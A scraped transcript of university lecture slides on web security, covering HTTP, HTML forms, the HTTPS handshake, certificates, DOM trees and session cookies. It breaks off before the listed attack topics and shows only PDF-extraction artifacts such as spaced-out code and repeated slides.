CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at...
Transcript of CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at...
![Page 1: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/1.jpg)
CSc 466/566
Computer Security
20 : Web SecurityVersion: 2013/04/15 16:27:59
Department of Computer ScienceUniversity of Arizona
Copyright c© 2013 Christian Collberg
Christian Collberg
1/74
![Page 2: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/2.jpg)
Outline
1 Introduction2 HTTPS3 Dynamic Content
DOM TreeSessions and Cookies
4 Attacks on ClientsSession HijackingClick-JackingPrivacy AttacksXSSCSRF
5 Attacks on ServersPHPFile InclusionSQL Injection Attacks
6 SummaryIntroduction 2/74
![Page 3: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/3.jpg)
Static Web Content
![Page 4: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/4.jpg)
Static Web Content
HTTP Request✞ ☎
GET / i ndex . html HTTP/1 .1Host : www. s i t e . com✝ ✆
![Page 5: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/5.jpg)
Static Web Content
HTTP Response✞ ☎
HTTP/1 . 1 200 OKSe r v e r : AppacheDate : Mon, 1 6 Apr 2 0 1 2 2 1 : 4 4 : 2 9 GMT
Ex p i r e s : −1Content−Type : t e x t /html ; c h a r s e t=ISO−8859−1
Set−Cookie : . . .Content−Length : 314
<! doctype html><html><body>. . .</body></html>✝ ✆
Introduction 3/74
![Page 6: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/6.jpg)
HTML
![Page 7: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/7.jpg)
HTML
HTTP Request✞ ☎
GET / i ndex . html HTTP/1 .1Host : www. s i t e . com✝ ✆
![Page 8: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/8.jpg)
HTML
HTTP Response✞ ☎
<b>bo ld tex t </b><ul>
< l i > l i s t i tem 1< l i > l i s t i tem 2
</ul><a h r e f=” s i t e . com/ boat . j pg ”>L ink !</a>
< s c r i p t >document . l o c a t i o n = . . .
</ s c r i p t ><img s r c=” boat . j pg ”>✝ ✆
Introduction 4/74
![Page 9: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/9.jpg)
Forms
![Page 10: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/10.jpg)
Forms
www.site.com/register.php
![Page 11: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/11.jpg)
Forms
✞ ☎<html><t i t l e >Re g i s t r a t i o n </ t i t l e >
<HTML><TITLE>Re g i s t r a t i o n </TITLE>
<BODY><FORM ACTION=” r e g i s t e r . php” METHOD=”GET”>
<INPUT TYPE=” t e x t ” NAME=”name”><INPUT TYPE=” t e x t ” NAME=” ema i l ”><INPUT TYPE=” submi t ” VALUE=”Submit”>
</FORM></BODY></HTML>✝ ✆
![Page 12: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/12.jpg)
Forms
HTTP Request✞ ☎
www. s i t e . com/ r e g i s t e r . php ?
name=” A l i c e ”&ema i l=” a l i c e@gma i l . com”
✝ ✆
Introduction 5/74
![Page 13: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/13.jpg)
Confidentiality
HTTP requests and responses are delivered via TCP on port80.
All traffic is in the clear !
MITM attacks.
Introduction 6/74
![Page 14: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/14.jpg)
Outline
1 Introduction2 HTTPS3 Dynamic Content
DOM TreeSessions and Cookies
4 Attacks on ClientsSession HijackingClick-JackingPrivacy AttacksXSSCSRF
5 Attacks on ServersPHPFile InclusionSQL Injection Attacks
6 SummaryHTTPS 7/74
![Page 15: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/15.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
HTTPS 8/74
![Page 16: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/16.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
HTTPS 8/74
![Page 17: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/17.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
3 The server selects the strongest ciphers/hash functions theyboth support.
HTTPS 8/74
![Page 18: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/18.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
3 The server selects the strongest ciphers/hash functions theyboth support.
4 chase.com tells the browser of its cryptographic choices.
HTTPS 8/74
![Page 19: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/19.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
3 The server selects the strongest ciphers/hash functions theyboth support.
4 chase.com tells the browser of its cryptographic choices.
5 chase.com sends the browser its certificate Certchase.com,containing its public key Pchase.com.
HTTPS 8/74
![Page 20: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/20.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
3 The server selects the strongest ciphers/hash functions theyboth support.
4 chase.com tells the browser of its cryptographic choices.
5 chase.com sends the browser its certificate Certchase.com,containing its public key Pchase.com.
6 The browser verifies the authenticity of Certchase.com.
HTTPS 8/74
![Page 21: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/21.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
3 The server selects the strongest ciphers/hash functions theyboth support.
4 chase.com tells the browser of its cryptographic choices.
5 chase.com sends the browser its certificate Certchase.com,containing its public key Pchase.com.
6 The browser verifies the authenticity of Certchase.com.
7 Browser generates a random number R .
HTTPS 8/74
![Page 22: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/22.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
3 The server selects the strongest ciphers/hash functions theyboth support.
4 chase.com tells the browser of its cryptographic choices.
5 chase.com sends the browser its certificate Certchase.com,containing its public key Pchase.com.
6 The browser verifies the authenticity of Certchase.com.
7 Browser generates a random number R .
8 The browser encrypts R with Pchase.com and sends it to chase.com.
HTTPS 8/74
![Page 23: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/23.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
3 The server selects the strongest ciphers/hash functions theyboth support.
4 chase.com tells the browser of its cryptographic choices.
5 chase.com sends the browser its certificate Certchase.com,containing its public key Pchase.com.
6 The browser verifies the authenticity of Certchase.com.
7 Browser generates a random number R .
8 The browser encrypts R with Pchase.com and sends it to chase.com.
9 Starting from R , the browser and chase.com generate a sharedsecret key K .
HTTPS 8/74
![Page 24: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/24.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
3 The server selects the strongest ciphers/hash functions theyboth support.
4 chase.com tells the browser of its cryptographic choices.
5 chase.com sends the browser its certificate Certchase.com,containing its public key Pchase.com.
6 The browser verifies the authenticity of Certchase.com.
7 Browser generates a random number R .
8 The browser encrypts R with Pchase.com and sends it to chase.com.
9 Starting from R , the browser and chase.com generate a sharedsecret key K .
10 Subsequent messages M: send EK (M),H(K ||M).
HTTPS 8/74
![Page 26: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/26.jpg)
Cross-Site Request Forgery — Login Attack. . .
Alice chase.com
verisign.com
https://chase.com
![Page 27: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/27.jpg)
Cross-Site Request Forgery — Login Attack. . .
Alice chase.com
verisign.com
3DES,AES,SHA-1,...
![Page 28: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/28.jpg)
Cross-Site Request Forgery — Login Attack. . .
Alice chase.com
verisign.com
Let’s use AES,SHA-1!
![Page 29: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/29.jpg)
Cross-Site Request Forgery — Login Attack. . .
Alice chase.com
verisign.com
Certchase.com
![Page 30: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/30.jpg)
Cross-Site Request Forgery — Login Attack. . .
Alice chase.com
verisign.com
Verify chase.com
![Page 31: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/31.jpg)
Cross-Site Request Forgery — Login Attack. . .
Alice chase.com
verisign.com
EPchase.com (R)
![Page 32: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/32.jpg)
Cross-Site Request Forgery — Login Attack. . .
Alice chase.com
verisign.com
EK (M),H(K ||M)
![Page 33: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/33.jpg)
Cross-Site Request Forgery — Login Attack. . .
Alice chase.com
verisign.com
EK (M),H(K ||M)
HTTPS 9/74
![Page 34: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/34.jpg)
Digital Certificates
A Certificate Authority (CA) is a trusted third party (TTT)who issues a certificate stating that
The Bob who lives on Desolation Row and hasphone number (555) 867-5309 and the emailaddress [email protected] has the public key PB . Thiscertificate is valid until June 11, 2012.
The CA has to digitally sign (with their private key SCA) thiscertificate so that we know that it’s real.
HTTPS 10/74
![Page 35: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/35.jpg)
Extended Validation Digital Certificates
Domain validation only SSL certificates: only minimalverification of the details in the certificate.
A Extended Validation Certificate can only be issued by a CAwho passes an audit, that they vet applications according tostrict criteria.
Same structure as other X.509 public key certificates.
Not stronger encryption.
HTTPS 11/74
![Page 36: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/36.jpg)
Extended Validation Digital Certificates. . .
In 2006, researchers at Stanford University and MicrosoftResearch conducted a usability study of the EV display inInternet Explorer 7. Their paper concluded thatparticipants who received no training in browser securityfeatures did not notice the extended validation indicatorand did not outperform the control group, whereasparticipants who were asked to read the Internet Explorerhelp file were more likely to classify both real and fakesites as legitimate.
Source: http://en.wikipedia.org/wiki/Extended_Validation_Certificate
HTTPS 12/74
![Page 37: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/37.jpg)
Certificate Hierarchy
Certificates are signed by certificates higher in acertificate hierarchy .
The root certificate is self-signed .
Chain of Trust — Similar to the Trusted Platform Module’strusted boot.
HTTPS 13/74
![Page 38: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/38.jpg)
Checking the Validity of a Certificate
Is the certificate signed by a known trusted CA (pre-installedin the browser)?
Has the certificate expired?
Is the certificate revoked?1 Extract the revocation cite URL from the certificate.2 Get the certificate revocation list.3 Is the list signed by the CA?4 Is this certificate serial number on the list?
HTTPS 14/74
![Page 39: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/39.jpg)
In-Class Exercise: Goodrich & Tamassia C-7.8
Suppose a web client and web server for a popular shoppingweb site have performed a key exchange so that they are nowsharing a secret session key.
Describe a secure method for the web client to then navigatearound various pages of the shopping site, optionally placingthings into a shopping cart.
Your solution is allowed to use one-way hash functions andpseudo-random number generators, but it cannot use HTTPS,so it does not need to achieve condentiality.
Your solution should be resistant to HTTP session hijackingeven from someone who can sniff all the packets.
HTTPS 15/74
![Page 40: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/40.jpg)
Outline
1 Introduction2 HTTPS3 Dynamic Content
DOM TreeSessions and Cookies
4 Attacks on ClientsSession HijackingClick-JackingPrivacy AttacksXSSCSRF
5 Attacks on ServersPHPFile InclusionSQL Injection Attacks
6 SummaryDynamic Content 16/74
![Page 41: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/41.jpg)
Dynamic Content
Plain html pages are static .
Dynamic content can change, even without reloading thepage.
Client-side scripts are included in web pages to providedynamic content.
Web pages are represented internally in the browser asDOM trees (Document Object Model ).
Scripts can manipulate the DOM tree.
Most scripts are written in JavaScript .
Dynamic Content 17/74
![Page 42: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/42.jpg)
DOM Tree Example
✞ ☎
<html><head>
< t i t l e >The document</ t i t l e ></head><body>
<d iv>Data</d iv><ul>
< l i >Warning</ l i >< l i ></ l i >
</ul><d iv>Top Sec r e t !</ d iv>
</body></html>✝ ✆
Source: http://javascript.info/tutorial/dom-nodes
Dynamic Content 18/74
![Page 43: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/43.jpg)
DOM Tree Example. . .
HTML
HEAD
TITLE
The document
BODY
DIV
Data
UL
LI
Warning
LI
DIV
Top Secret!
Dynamic Content 19/74
![Page 44: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/44.jpg)
JavaScript
JavaScript code can be included within HTML documents:✞ ☎
< s c r i p t type=” t e x t / j a v a s c r i p t ”>f u n c t i o n h e l l o ( ) {
a l e r t ( ” He l l o wor ld ! ” ) ;}</ s c r i p t>✝ ✆
JavaScript functions can be invoked as a result of clicks, etc.:✞ ☎
<img s r c=” . . . ”onMouseOver=” j a v a s c r i p t : h e l l o ( ) ”>
✝ ✆
Dynamic Content 20/74
![Page 45: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/45.jpg)
DOM Tree Traversal
DOM tree node properties:
name description
firstChild, lastChild start/end of this node’s list ofchildren
childNodes array of all this node’s children
nextSibling, previousSibling neighboring nodes with thesame parent
parentNode the element that contains thisnode
Thus, you can traverse the DOM tree from within JavaScript:✞ ☎
window . document . ch i l dNodes [ 0 ] . ch i l dNodes [ 1 ] .ch i l dNodes [ 4 ]
✝ ✆
Dynamic Content 21/74
![Page 46: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/46.jpg)
Sessions
HTTP is a state-less protocol:
every time a browser asks for a page is a new event to theserver;the server keeps no information (automatically) between pageloads.
A session is extra information stored about a visitor betweeninteractions.
Three methods to keep track of sessions:1 Hidden form fields ,2 Client-side cookies ,3 Server-side session .
We must protect against session hijacking — an attackergetting hold of a user’s session information and impersonatinghim to the server.
Dynamic Content 22/74
![Page 47: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/47.jpg)
Sessions Using Hidden Form Fields
Any information that needs to survive between interactions isstored in the browser in hidden fields in the HTML.
The information is sent back to the server in POST or GETrequests.
✞ ☎
<HTML><BODY><FORM ACTION=” ht tp ://www. v i c t o r i a s s e c r e t . com/buy . j s p ”
METHOD=” get ”><INPUT TYPE=” h idden ” NAME=”name” VALUE=” A l i c e ”><INPUT TYPE=” h idden ” NAME=” he i gh t ” VALUE=”170cm”><INPUT TYPE=” h idden ” NAME=”weight ” VALUE=”53kg”><INPUT TYPE=” submit ”></FORM></BODY></HTML>✝ ✆
HTTP is sent in cleartext — susceptible to MITM attack.
Dynamic Content 23/74
![Page 48: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/48.jpg)
Sessions Using Hidden Form Fields. . .
![Page 49: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/49.jpg)
Sessions Using Hidden Form Fields. . .
name=Alice&height=170cm&weight=53kg
![Page 50: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/50.jpg)
Sessions Using Hidden Form Fields. . .
name=Alice&height=170cm&weight=53kg
<INPUT TYPE=”hidden ” NAME=”name” VALUE=” A l i c e ”>
<INPUT TYPE=”hidden ” NAME=” he i gh t ” VALUE=”170cm”>
<INPUT TYPE=”hidden ” NAME=”we ight ” VALUE=”53kg”>
![Page 51: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/51.jpg)
Sessions Using Hidden Form Fields. . .
Eve
name=Alice&height=170cm&weight=53kg
<INPUT TYPE=”hidden ” NAME=”name” VALUE=” A l i c e ”>
<INPUT TYPE=”hidden ” NAME=” he i gh t ” VALUE=”170cm”>
<INPUT TYPE=”hidden ” NAME=”we ight ” VALUE=”53kg”>
Use HTTPS instead.
Dynamic Content 24/74
![Page 52: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/52.jpg)
Sessions Using Cookies
A cookie is a piece of data sent to the client by the webserver.
The cookie is stored on the client.
When the user returns to the site, the cookie is sent to theweb server.
cookie✞ ☎”name”=” A l i c e ”” he i gh t ”=”170cm””we ight ”=”53kg”e x p i r e =10 Dec , 2012domain=. v i c t o r i a s s e c r e t . compath : /send f o r : any type✝ ✆
Dynamic Content 25/74
![Page 53: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/53.jpg)
Sessions Using Cookies
Let’s assume Alice is browsing to http://www.victoriassecret.com.
She fills out a form with her personal data:✞ ☎
<HTML><BODY><FORM ACTION=” ht tp ://www. v i c t o r i a s s e c r e t . com/buy . j s p ”
METHOD=” get ”><INPUT TYPE=” in pu t ” NAME=”name” VALUE=” A l i c e ”><INPUT TYPE=” in pu t ” NAME=” he i gh t ” VALUE=”170cm”><INPUT TYPE=” in pu t ” NAME=”weight ” VALUE=”53kg”><INPUT TYPE=” submit ”></FORM></BODY></HTML>✝ ✆
Dynamic Content 26/74
![Page 54: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/54.jpg)
![Page 55: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/55.jpg)
<INPUT TYPE=” i npu t ” NAME=”name” VALUE=” A l i c e ”>
<INPUT TYPE=” i npu t ” NAME=” he i gh t ” VALUE=”170cm”>
<INPUT TYPE=” i npu t ” NAME=”we ight ” VALUE=”53kg”>
![Page 56: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/56.jpg)
cookie✞ ☎
”name”=” A l i c e ”” he i gh t ”=”170cm””we ight ”=”53kg”e x p i r e =10 Dec , 2012
domain=. v i c t o r i a s s e c r e t . com
path : /send f o r : any type✝ ✆
![Page 57: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/57.jpg)
cookie✞ ☎”name”=” A l i c e ”” he i gh t ”=”170cm””we ight ”=”53kg”e x p i r e =10 Dec , 2012domain=. v i c t o r i a s s e c r e t . compath : /send f o r : any type✝ ✆
![Page 58: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/58.jpg)
cookie✞ ☎”name”=” A l i c e ”” he i gh t ”=”170cm””we ight ”=”53kg”e x p i r e =10 Dec , 2012domain=. v i c t o r i a s s e c r e t . compath : /send f o r : any type✝ ✆
cookie✞ ☎
”name”=” A l i c e ”” he i gh t ”=”170cm””we ight ”=”53kg”e x p i r e =10 Dec , 2012
domain=. v i c t o r i a s s e c r e t . com
path : /send f o r : any type✝ ✆
![Page 59: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/59.jpg)
Sessions Using Cookies — Cookie Properties
Expiration date : none specified, the cookie is deleted whenthe user exits the browser.
Domain name — the site for which this cookie is valid:
